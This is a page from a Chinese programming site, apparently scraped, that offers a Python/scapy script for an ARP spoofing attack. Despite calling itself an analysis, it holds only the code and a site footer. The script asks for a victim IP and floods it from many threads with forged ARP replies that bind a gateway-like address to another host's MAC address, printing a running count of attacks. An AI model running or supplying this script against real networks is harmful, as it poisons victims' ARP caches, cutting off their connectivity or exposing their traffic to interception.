概述
# -*- coding: cp936 -*-
from scapy.all import *
from threading import Thread,Lock,activeCount
BROADCASTMAC = getmacbyip('192.168.0.120')
class Loop(Thread):
def __init__(self,ip):
Thread.__init__(self)
self.ip = ip
def run(self):
global BROADCASTMAC
arp = ARP()
arp.psrc = '192.168.0.251'
arp.hwsrc = BROADCASTMAC
arp.pdst = self.ip
arp.op = 2
sr1(arp,verbose = 0,retry = 0,timeout = 3)
class Main(Thread):
def __init__(self,ip):
Thread.__init__(self)
self.ip = ip
def run(self):
limit = 100
total = 0
while True:
if activeCount() < limit:
Loop(self.ip).start()
total = total + 1
print '目前已进行了ARP攻击的次数为:'+str(total)
if __name__ == '__main__':
ip = raw_input('请输入要进行ARP攻击的机器IP:')
Main(ip = ip).start()
最后
以上就是清脆小刺猬为你收集整理的python发送arp欺骗攻击代码分析的全部内容,希望文章能够帮你解决python发送arp欺骗攻击代码分析所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复